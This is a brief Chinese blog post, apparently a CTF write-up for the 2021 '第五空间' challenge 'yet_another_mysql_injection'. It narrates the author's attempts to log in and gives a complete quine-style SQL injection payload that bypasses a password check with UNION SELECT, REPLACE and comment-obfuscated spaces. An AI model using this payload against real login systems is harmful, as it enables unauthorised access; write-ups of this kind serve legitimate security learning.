[第五空间 2021]yet_another_mysql_injection

image

随便输入进去,发现只有账号是admin可以进入

image

使用弱密码admin admin,报错为hacker

image

就没啥办法了,想着F12看一下源码

image

发现有一个source,打开看看

image

可以发现username是固定的admin,password需要直接手动输入

image

这时就不知道咋整了,上网搜了一下

username=admin&password='UNION/**/SELECT/**/REPLACE(REPLACE('"UNION/**/SELECT/**/REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")/**/AS/**/a#',CHAR(34),CHAR(39)),CHAR(63),'"UNION/**/SELECT/**/REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")/**/AS/**/a#')/**/AS/**/a#
image

posted @ 2022-05-23 21:41  traveller-2333  阅读(78)  评论(0编辑  收藏  举报